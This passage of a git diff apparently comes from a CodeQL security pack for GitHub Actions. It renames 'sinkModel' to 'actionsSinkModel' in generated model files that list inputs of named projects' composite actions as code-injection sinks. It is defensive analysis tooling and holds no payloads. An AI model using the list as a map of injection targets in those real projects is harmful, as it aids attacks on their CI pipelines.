b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index e1ff1fa3497c..e120de812c40 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index 4c5ef712e587..1be37285c9ef 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] - ["inspektor-gadget/inspektor-gadget", "*", "input.registry", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index 31e1f562877e..aa6e9b684d08 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index 298ba1ccbe3b..221aa83de0b0 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] - ["ionic-team/ionic-framework", "*", "input.shard", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 0dc57625890c..710079324272 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] - ["ionic-team/ionicons", "*", "input.output", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index c6fc16750f8b..bff13b29ecc1 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] - ["ionic-team/stencil", "*", "input.output", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index 0cbbd38d4280..1f75dd81c046 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] - ["ipfs/aegir", "*", "input.docker-username", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index acc6cb91c076..15604c34a17a 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index c59e989db046..aef7f4f6242c 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "input.application-packaging", "code-injection", "generated"] @@ -22,6 +22,6 @@ extensions: - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index b426dfb250da..f3a26e867ec6 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index 4a0c3c2d30f5..4feab5714c79 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] - ["juicedata/juicefs", "*", "input.storage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 74d0ef69f753..3030f81072a0 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] - ["jupyter/docker-stacks", "*", "input.image", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index ac8762d24eab..7f8885d1ec78 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] - ["keycloak/keycloak", "*", "input.jobs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 6df9a160ec5d..93e6b1e03122 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] - ["kserve/kserve", "*", "input.deployment-mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 0c2793028a0a..5284159e9db5 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] - ["kubeflow/katib", "*", "input.database-type", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index f5bdc3d4bcc9..ac8b8a5150ae 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 161022b8cbea..19e9448994eb 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 391b19170293..82c5713f9435 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 3a45707d59ef..2d4108331b91 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] - ["kubescape/kubescape", "*", "input.SUB_STRING", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index c2e3608f7458..ccd49962fa4b 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] - ["kubeshop/botkube", "*", "input.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index 9b8e9d1e7ed4..a7e56c8626d0 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] - ["kyverno/kyverno", "*", "input.sbom-name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 954f2c346615..4c0df425e458 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] - ["lancedb/lance", "*", "input.vcpkg_token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index 31cb8acad9e5..a69f2303dbe4 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index 4c8df154d8e6..c2c87969e936 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] - ["layer5labs/meshmap-snapshot", "*", "input.mesheryToken", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index 8366d5119aea..c1c3bf433cdc 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] - ["ldc-developers/ldc", "*", "input.build_targets", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index a5d99cfc5e0f..af21dca82055 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] - ["ledgerhq/ledger-live", "*", "input.turborepo-server-port", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index e07d26e6a5f2..18fdeffe1ec2 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index 3fe7b27d9d53..ee67e8821744 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] - ["lf-edge/eve", "*", "input.dockerhub-account", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 664c28bfc553..49caeb5f1dcf 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] - ["libgit2/libgit2", "*", "input.container-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index 7b90ed202348..dda74b285da7 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] - ["lightning-ai/pytorch-lightning", "*", "input.pkg-folder", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index 62b31c2d3ef9..4b144103f8fb 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] - ["lightning-ai/torchmetrics", "*", "input.torch-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 427b75730abe..931658c0bb5e 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "input.docker-registry", "code-injection", "generated"] @@ -9,7 +9,7 @@ extensions: - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] - ["linkerd/linkerd2", "*", "input.tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index 441913730fa1..f29632176626 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] - ["logseq/publish-spa", "*", "input.theme-mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index cbb2b43a2d8e..1578e397369d 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] - ["macvim-dev/macvim", "*", "input.formula", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 2f981b5bd63e..17c45e0d8edd 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] - ["mamba-org/mamba", "*", "input.key_base", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index 5d3d44e914c8..4e26b8728001 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] - ["maplibre/maplibre-native", "*", "input.externalData", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index 7b41c1b27215..d5fa53d1bbb3 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index 505fbb220058..f90fb1c5e63e 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] - ["mavlink/qgroundcontrol", "*", "input.aws_key_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index 24223da3c896..d16c0792c6da 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] - ["mdanalysis/mdanalysis", "*", "input.full-deps", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index b529c0117f4d..4d009c2d47db 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] - ["medic/cht-core", "*", "input.password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index 6a46669f05db..afd875c22057 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] - ["medusajs/medusa", "*", "input.password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index ec2f45f31dbf..680bbe27bcb4 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] - ["metabase/metabase", "*", "input.github_token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index 3574855be3c0..ffe074d3dea9 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] - ["metamask/action-create-release-pr", "*", "input.created-pr-status", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index 4ee1b878e54b..e53a58412c9e 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index 8453a2d415c6..a899f727e395 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index dc86b7959812..0c7c2e1bded6 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] - ["microsoft/playwright", "*", "input.connection_string", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index ca9cc034d10f..3d631e60dc37 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] - ["microsoft/wsl", "*", "input.similar_issues_text", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index b8aecfd5e3dc..2f8710d2cbd0 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml 
